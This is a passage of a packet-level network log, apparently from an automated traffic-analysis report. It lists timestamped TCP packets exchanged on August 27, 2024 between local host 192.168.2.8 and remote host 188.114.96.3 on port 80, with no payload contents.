                                Aug 27, 2024 09:49:39.677648067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677659035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677670956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677681923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677685022 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677692890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677705050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677716017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677726984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677728891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677740097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677747011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677756071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677766085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677767038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677784920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677784920 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677795887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677807093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677810907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677818060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677829027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677834988 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677841902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677853107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677855968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677866936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677877903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677887917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677891016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677901030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677901030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677911997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677922964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677933931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677936077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677944899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677953959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677956104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677968979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677973986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.677979946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677984953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677994967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.677998066 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.678008080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.678020000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.678029060 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.678030014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.678052902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.726723909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.760823965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760843992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760854959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760907888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.760950089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760960102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760970116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760979891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760989904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.760993958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761033058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761048079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761058092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761068106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761075974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761086941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761096954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761107922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761110067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761132002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761149883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761225939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761235952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761245012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761255980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761270046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761272907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761281013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761288881 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761291981 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761305094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761317015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761317968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761357069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761385918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761400938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761419058 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761426926 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761430025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761440039 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761450052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761452913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761461020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761473894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761478901 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761508942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761538029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761548042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761574030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761706114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761715889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761725903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761737108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761743069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761748075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761759043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761765003 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761770964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761780977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761791945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761791945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761802912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761815071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761818886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761837006 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761856079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761867046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761871099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761883974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761895895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761900902 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761907101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761919022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761929035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.761930943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.761970043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762096882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762106895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762118101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762130976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762131929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762142897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762154102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762159109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762166023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762178898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762188911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762192011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762200117 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762207985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762233019 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762404919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762417078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762425900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762437105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762442112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762448072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762459993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762459993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762476921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762486935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762489080 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762499094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762510061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762510061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762521029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762533903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762542963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762545109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762556076 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762564898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762567043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762573957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762619972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762664080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762676001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762686968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762698889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762708902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762713909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762721062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762732029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762732983 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762743950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762754917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762763023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762794971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762825966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762837887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762855053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762864113 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762866974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762877941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762886047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762888908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762901068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762912989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762912989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762923002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.762947083 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.762969017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763040066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763051033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763062000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763077974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763143063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763154030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763164043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763175011 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763185978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763196945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763196945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763207912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763212919 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763230085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763247013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763257980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763268948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763278961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763293028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763309956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763309002 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763334036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763354063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763365030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763375044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763391018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763397932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763401985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.763412952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.763438940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.764071941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764081001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764091015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764116049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764126062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764137030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764138937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.764152050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764153004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.764183044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.764205933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764214993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.764246941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.847942114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.847954988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.847966909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848037004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848086119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848098040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848109961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848120928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848131895 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848134041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848145962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848154068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848186970 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848208904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848220110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848232031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848249912 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848272085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848310947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848323107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848334074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848345995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848356009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848357916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848381996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.848530054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848541021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.848578930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849112988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849124908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849136114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849145889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849162102 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849184990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849267960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849286079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849296093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849312067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849314928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849323988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849334955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849342108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849349022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849359035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849363089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849370003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849380016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849386930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849391937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849401951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849411011 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849421024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849432945 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849435091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849442959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849451065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849462032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849473000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849474907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849495888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849513054 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849620104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849664927 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.849767923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849914074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849926949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.849957943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850214958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850225925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850235939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850249052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850260019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850266933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850270987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850282907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850289106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850295067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850315094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850326061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850351095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850361109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850373030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850388050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850411892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850552082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850564003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850574017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850585938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850617886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850642920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850708961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850720882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850730896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850743055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850760937 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850771904 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.850871086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850882053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.850917101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851073027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851084948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851094961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851106882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851118088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851118088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851130009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851141930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851152897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851161957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851162910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851176023 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:39.851178885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:39.851191044 CEST8049715188.114.96.3192.168.2.8
